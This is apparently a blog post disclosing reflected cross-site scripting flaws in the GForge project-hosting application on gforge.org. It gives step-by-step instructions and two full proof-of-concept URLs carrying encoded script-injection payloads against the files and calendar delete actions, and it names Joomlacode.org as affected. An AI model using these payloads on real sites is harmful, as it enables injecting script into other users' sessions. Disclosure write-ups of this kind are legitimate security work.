This is for Joomla Developers;XSS in Gforge App

Hacker “Sony” discoveredCross site scripting vulnerability in the GForge web Application.  GForge is a free software fork of the web-based project-management and collaboration software originally created for SourceForge, called Savane. GForge provides project hosting, version control (CVS and Subversion), bug-tracking, and messaging.Hacker made two accounts for testing and discovered XSS in the files,calendar,messagewall (search users), blogs..The Vulnerability Description:

XSS using Files:
After creating fake account, upload your file.

It will available in this location:
http://gforge.org/gf/user/eleo/userfiles/

And press button delete and open link in the new window and add in the url our xss.

http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%5Bour xss is here]

Poc:
http://gforge.org/gf/user/eleo/userfiles/my/admin/?action=UserfileDelete&file_id=3089%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

XSS in Calendar:

Open calendar and press button “add new event” and press button delete and open link in the new window and add in the url our xss.

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%5Bour xss is here]

Poc:

http://gforge.org/gf/user/eleo/usercalendar/my/?action=UsercalendarEventDelete&event_id=6&redirect_to=monthview&start_date=1327881600%27;alert%28String.fromCharCode%2888,83,83%29%29//%27;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//%22;alert%28String.fromCharCode%2888,83,83%29%29//–%3E%3C/SCRIPT%3E%22%3E%27%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888,83,83%29%29%3C/SCRIPT%3E

The vulnerability affects the following sites:

Joomlacode.org and other sites that using Gforge app.

Advertisements

Leave a Reply

Please log in using one of these methods to post your comment:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s